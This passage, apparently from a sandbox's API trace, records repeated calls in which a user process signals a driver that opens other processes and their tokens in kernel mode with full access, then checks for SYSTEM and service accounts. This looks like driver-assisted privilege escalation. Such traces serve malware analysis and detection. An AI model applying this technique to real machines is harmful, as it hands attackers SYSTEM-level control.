HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80018b95d0, HandleInformation=0x0) returned 0x0 [0183.063] ObOpenObjectByPointer (in: Object=0xfffffa80018b95d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.063] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x17d [0183.063] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002140500 | out: TokenHandle=0xfffffa8002140500*=0xc0) returned 0x0 [0183.063] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.063] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.063] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.063] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.069] CloseHandle (hObject=0xc0) returned 1 [0183.069] CloseHandle (hObject=0xc4) returned 1 [0183.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0xc4 [0183.069] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.069] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800bafe630, HandleInformation=0x0) returned 0x0 [0183.069] ObOpenObjectByPointer (in: Object=0xfffffa800bafe630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.069] ObfDereferenceObject (Object=0xfffffa800bafe630) returned 0x6c [0183.070] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.070] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.070] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.070] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.070] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.072] CloseHandle (hObject=0xc0) returned 1 [0183.072] CloseHandle (hObject=0xc4) returned 1 [0183.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0xc4 [0183.072] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.072] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8003498b30, HandleInformation=0x0) returned 0x0 [0183.072] ObOpenObjectByPointer (in: Object=0xfffffa8003498b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.072] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0183.072] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.072] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.072] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.072] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.072] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.074] CloseHandle (hObject=0xc0) returned 1 [0183.074] CloseHandle (hObject=0xc4) returned 1 [0183.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0xc4 [0183.075] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.075] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8003653680, HandleInformation=0x0) returned 0x0 [0183.075] ObOpenObjectByPointer (in: Object=0xfffffa8003653680, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.075] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe1 [0183.075] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.075] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.075] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.075] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.075] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.078] CloseHandle (hObject=0xc0) returned 1 [0183.078] CloseHandle (hObject=0xc4) returned 1 [0183.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0xc4 [0183.078] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.078] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8003654700, HandleInformation=0x0) returned 0x0 [0183.078] ObOpenObjectByPointer (in: Object=0xfffffa8003654700, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.078] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x42 [0183.078] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.078] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.078] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.078] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.078] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.081] CloseHandle (hObject=0xc0) returned 1 [0183.081] CloseHandle (hObject=0xc4) returned 1 [0183.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x250) returned 0xc4 [0183.081] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.081] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80036f9b30, HandleInformation=0x0) returned 0x0 [0183.081] ObOpenObjectByPointer (in: Object=0xfffffa80036f9b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.081] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x81 [0183.081] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.081] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.081] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.082] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.082] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.084] CloseHandle (hObject=0xc0) returned 1 [0183.084] CloseHandle (hObject=0xc4) returned 1 [0183.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0xc4 [0183.084] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.084] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8003737b30, HandleInformation=0x0) returned 0x0 [0183.084] ObOpenObjectByPointer (in: Object=0xfffffa8003737b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.085] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb5 [0183.085] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.085] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.085] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.085] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.085] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.087] CloseHandle (hObject=0xc0) returned 1 [0183.087] CloseHandle (hObject=0xc4) returned 1 [0183.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xc4 [0183.087] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.087] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8003762b30, HandleInformation=0x0) returned 0x0 [0183.087] ObOpenObjectByPointer (in: Object=0xfffffa8003762b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.087] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbc [0183.087] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.087] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.087] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.088] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.088] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.089] CloseHandle (hObject=0xc0) returned 1 [0183.090] CloseHandle (hObject=0xc4) returned 1 [0183.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x338) returned 0xc4 [0183.090] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.090] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8003801b30, HandleInformation=0x0) returned 0x0 [0183.090] ObOpenObjectByPointer (in: Object=0xfffffa8003801b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.090] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xd0 [0183.090] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.090] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.090] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.090] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.091] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.093] CloseHandle (hObject=0xc0) returned 1 [0183.093] CloseHandle (hObject=0xc4) returned 1 [0183.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x370) returned 0xc4 [0183.093] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.093] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800382ab30, HandleInformation=0x0) returned 0x0 [0183.093] ObOpenObjectByPointer (in: Object=0xfffffa800382ab30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.093] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d1 [0183.093] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.093] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.093] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.093] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.094] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.096] CloseHandle (hObject=0xc0) returned 1 [0183.096] CloseHandle (hObject=0xc4) returned 1 [0183.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0183.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc8) returned 0xc4 [0183.096] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.096] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80038b5b30, HandleInformation=0x0) returned 0x0 [0183.096] ObOpenObjectByPointer (in: Object=0xfffffa80038b5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.096] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xd1 [0183.096] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.096] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.097] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.097] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.097] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.099] CloseHandle (hObject=0xc0) returned 1 [0183.099] CloseHandle (hObject=0xc4) returned 1 [0183.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x11c) returned 0xc4 [0183.099] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.099] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80038c8b30, HandleInformation=0x0) returned 0x0 [0183.099] ObOpenObjectByPointer (in: Object=0xfffffa80038c8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.099] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb2 [0183.099] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.099] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.099] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.100] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.100] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.102] CloseHandle (hObject=0xc0) returned 1 [0183.102] CloseHandle (hObject=0xc4) returned 1 [0183.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x444) returned 0xc4 [0183.102] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.102] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80036e4060, HandleInformation=0x0) returned 0x0 [0183.102] ObOpenObjectByPointer (in: Object=0xfffffa80036e4060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.102] ObfDereferenceObject (Object=0xfffffa80036e4060) returned 0x2d [0183.102] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: 